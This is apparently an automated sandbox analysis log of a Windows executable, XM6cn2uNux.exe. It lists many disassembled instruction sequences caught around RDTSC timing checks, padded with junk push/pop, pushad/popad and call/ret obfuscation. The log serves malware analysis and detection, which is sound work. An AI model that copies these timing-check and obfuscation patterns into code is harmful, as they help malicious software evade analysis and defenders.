Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5F0559 second address: 5F0571 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC57CD4ED02h 0x00000008 je 00007FC57CD4ECF6h 0x0000000e jns 00007FC57CD4ECF6h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5F3726 second address: 5F372A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5F372A second address: 5F3730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5F3730 second address: 5F374B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC57C52C321h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5F3A32 second address: 5F3A36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5F3A36 second address: 5F3A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC57C52C324h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5F3A50 second address: 5F3A57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5F3A57 second address: 5F3A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5F3BB4 second address: 5F3BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57CD4ECFDh 0x00000009 popad 0x0000000a pop ebx 0x0000000b jc 00007FC57CD4ED0Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007FC57CD4ECF6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5F3BD5 second address: 5F3BDB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5F9A26 second address: 5F9A97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED06h 0x00000007 jg 00007FC57CD4ED11h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC57CD4ECFDh 0x00000016 pushad 0x00000017 jmp 00007FC57CD4ECFDh 0x0000001c jmp 00007FC57CD4ED02h 0x00000021 jng 00007FC57CD4ECF6h 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5FFE87 second address: 5FFEA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC57C52C331h 0x0000000a jmp 00007FC57C52C325h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5FF1E9 second address: 5FF1EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5FF4B8 second address: 5FF4BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5FF4BD second address: 5FF4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC57CD4ED00h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5FF4D5 second address: 5FF4E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jo 00007FC57C52C31Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5FF666 second address: 5FF673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FC57CD4ECF6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5FFD22 second address: 5FFD28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5FFD28 second address: 5FFD2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 60599B second address: 6059C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FC57C52C322h 0x0000000a jmp 00007FC57C52C31Ah 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 push edi 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC57C52C31Bh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 6059C3 second address: 6059D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FC57CD4ECF6h 0x0000000e jns 00007FC57CD4ECF6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 604E3A second address: 604E58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C327h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 604E58 second address: 604E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57CD4ED09h 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 604E79 second address: 604E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FC57C52C31Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 604E8C second address: 604EB0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC57CD4ECF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jmp 00007FC57CD4ED05h 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 604EB0 second address: 604EB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 60567A second address: 6056CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED09h 0x00000007 jmp 00007FC57CD4ECFEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007FC57CD4ED10h 0x00000016 push esi 0x00000017 jg 00007FC57CD4ECF6h 0x0000001d pop esi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 6056CF second address: 6056E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FC57C52C31Fh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 6056E8 second address: 6056EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 6056EC second address: 6056F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 58F294 second address: 58F298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 58F298 second address: 58F29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5CD483 second address: 5B2C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FC57CD4ED05h 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FC57CD4ECF8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov edx, dword ptr [ebp+122D1A4Ah] 0x0000002c mov edi, dword ptr [ebp+122D370Ah] 0x00000032 call dword ptr [ebp+122D22C3h] 0x00000038 pushad 0x00000039 pushad 0x0000003a jmp 00007FC57CD4ECFBh 0x0000003f jmp 00007FC57CD4ECFEh 0x00000044 jmp 00007FC57CD4ECFFh 0x00000049 popad 0x0000004a jmp 00007FC57CD4ED06h 0x0000004f popad 0x00000050 js 00007FC57CD4ED21h 0x00000056 push eax 0x00000057 push edx 0x00000058 jne 00007FC57CD4ECF6h 0x0000005e rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5CDABF second address: 5CDB5A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC57C52C316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push ebx 0x0000000d jmp 00007FC57C52C322h 0x00000012 pop ebx 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jns 00007FC57C52C31Eh 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 pushad 0x00000021 push eax 0x00000022 pop eax 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 popad 0x00000026 pushad 0x00000027 pushad 0x00000028 popad 0x00000029 jmp 00007FC57C52C328h 0x0000002e popad 0x0000002f popad 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 jnc 00007FC57C52C31Eh 0x0000003a pop eax 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007FC57C52C318h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 00000014h 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 mov edx, 37668419h 0x0000005a call 00007FC57C52C319h 0x0000005f push eax 0x00000060 push edx 0x00000061 push ebx 0x00000062 pushad 0x00000063 popad 0x00000064 pop ebx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5CDB5A second address: 5CDB9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FC57CD4ED07h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007FC57CD4ED09h 0x00000019 mov eax, dword ptr [eax] 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5CE390 second address: 5CE395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5CE395 second address: 5CE422 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC57CD4ECFDh 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FC57CD4ECF8h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 jmp 00007FC57CD4ED09h 0x0000002e push 0000001Eh 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007FC57CD4ECF8h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a mov dx, 6CF9h 0x0000004e nop 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FC57CD4ECFFh 0x00000057 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5CE422 second address: 5CE433 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC57C52C316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5CE804 second address: 5CE885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007FC57CD4ECFCh 0x0000000a nop 0x0000000b lea eax, dword ptr [ebp+12478212h] 0x00000011 mov dword ptr [ebp+122D3467h], ebx 0x00000017 push ebx 0x00000018 mov dx, 01B9h 0x0000001c pop edx 0x0000001d nop 0x0000001e push ebx 0x0000001f jmp 00007FC57CD4ED01h 0x00000024 pop ebx 0x00000025 push eax 0x00000026 pushad 0x00000027 jg 00007FC57CD4ECF8h 0x0000002d pushad 0x0000002e jmp 00007FC57CD4ECFAh 0x00000033 pushad 0x00000034 popad 0x00000035 popad 0x00000036 popad 0x00000037 nop 0x00000038 sub dword ptr [ebp+122D1A80h], ecx 0x0000003e lea eax, dword ptr [ebp+124781CEh] 0x00000044 mov dword ptr [ebp+122D1CE8h], ebx 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push esi 0x0000004e jmp 00007FC57CD4ED08h 0x00000053 pop esi 0x00000054 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5CE885 second address: 5B37A3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC57C52C318h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FC57C52C318h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov dx, si 0x0000002c call dword ptr [ebp+1244F3D0h] 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5B37A3 second address: 5B37A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5B37A7 second address: 5B37F0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC57C52C316h 0x00000008 jno 00007FC57C52C316h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jng 00007FC57C52C316h 0x00000017 push eax 0x00000018 pop eax 0x00000019 jng 00007FC57C52C316h 0x0000001f popad 0x00000020 jno 00007FC57C52C31Eh 0x00000026 push eax 0x00000027 push edx 0x00000028 push ecx 0x00000029 pop ecx 0x0000002a jmp 00007FC57C52C327h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 6095A9 second address: 6095B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 6095B0 second address: 6095B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 6095B5 second address: 6095E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC57CD4ECF6h 0x0000000a jl 00007FC57CD4ECF6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007FC57CD4ECF6h 0x00000019 jmp 00007FC57CD4ED05h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 60987A second address: 60988A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C31Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 60988A second address: 6098A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC57CD4ECFBh 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 609A1A second address: 609A33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C322h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 609A33 second address: 609A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007FC57CD4ED00h 0x0000000d popad 0x0000000e jmp 00007FC57CD4ED02h 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 609BDA second address: 609BE4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC57C52C316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 609BE4 second address: 609BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 609BEE second address: 609BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 609E82 second address: 609E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC57CD4ECF6h 0x0000000a jmp 00007FC57CD4ECFEh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 609E9F second address: 609EA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 609EA5 second address: 609EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 609EAB second address: 609EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 61773A second address: 617740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 617740 second address: 617751 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC57C52C316h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 6163DB second address: 6163F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57CD4ECFDh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 6163F1 second address: 6163F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 616582 second address: 616586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 616A9B second address: 616ACC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC57C52C316h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC57C52C31Bh 0x00000013 jmp 00007FC57C52C328h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 616ACC second address: 616AE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 616AE6 second address: 616AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 616C31 second address: 616C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC57CD4ECF6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 616C40 second address: 616C45 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 616C45 second address: 616C4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 616C4B second address: 616C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jbe 00007FC57C52C31Ch 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 616C63 second address: 616C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007FC57CD4ED07h 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 616F36 second address: 616F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 jnc 00007FC57C52C316h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 616F46 second address: 616F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jns 00007FC57CD4ECFCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 616F57 second address: 616F6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C322h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 61AD3D second address: 61AD64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007FC57CD4ECF6h 0x0000000b jmp 00007FC57CD4ECFBh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FC57CD4ECFCh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 61AA33 second address: 61AA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC57C52C316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 61AA3D second address: 61AA41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 61AA41 second address: 61AA63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC57C52C328h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 61AA63 second address: 61AA75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007FC57CD4ECFAh 0x0000000e rdtsc
